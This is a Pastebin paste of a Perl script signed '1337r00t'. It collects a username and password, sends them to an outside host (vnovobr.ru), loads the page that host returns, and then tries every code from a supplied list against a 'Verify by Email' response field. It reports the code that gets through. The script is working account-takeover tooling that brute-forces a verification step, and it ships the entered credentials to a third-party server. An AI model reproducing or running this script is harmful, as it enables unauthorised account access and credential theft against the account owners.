Advertisement
Guest User

sa

a guest
Mar 24th, 2017
96
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.42 KB | None | 0 0
  1. use LWP::Simple;
  2. use WWW::Mechanize;
  3. use LWP::UserAgent;
  4. system('cls');
  5. system('color 3');
  6. print '
  7. #####################################
  8. Coded By 1337r00t
  9. #####################################
  10. ...........................................................................
  11. .%%%%....%%%%%%..%%%%%%..%%%%%%.......%%%%%%\...../%%%\..../%%%\....%%%%%%.
  12. ...%%........%%......%%.....(%/.......%%....%)...%:...:%..%:...:%.....%%...
  13. ...%%....%%%%%%..%%%%%%....(%/........%%%%)%.}...%:...:%..%:...:%.....%%...
  14. ...%%........%%......%%...(%/.........%%...\%)...%:...:%..%:...:%.....%%...
  15. .%%%%%%..%%%%%%..%%%%%%..(%...........%%....\%)...\%%%/....\%%%/......%%...
  16. ...........................................................................
  17. ';
  18. system('color 1e');
  19. print qq(
  20. Username => );
  21. $user=<STDIN>;
  22. chomp($user);
  23. print qq(
  24. Password => );
  25. $pass=<STDIN>;
  26. chomp($pass);
  27. print qq(
  28. Enter Codes File: [Ex:codex.txt]=> );
  29. $list=<STDIN>;
  30. chomp($list);
  31. open (CODEFILE, "<$list") || die "[-] Can't Open The List Of Passwords !";
  32. @LISTS = <CODEFILE>;
  33. close CODEFILE;
  34. foreach $C (@LISTS) {
  35. chomp $C;
  36. $data = get("http://vnovobr.ru/b.php?user=$user&pass=$pass");
  37. $mech = WWW::Mechanize->new();
  38. $mech->get($data);
  39. $mech->click_button(value => "Verify by Email");
  40. $mech->field(response_code => $C);
  41. $mech->click();
  42. if ($mech->content=~ /<p class="alert-red">/) {
  43. print "Not Him $C\n";
  44. }
  45. else {
  46. print "[ Him : $C ]";
  47. exit;
  48. }}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement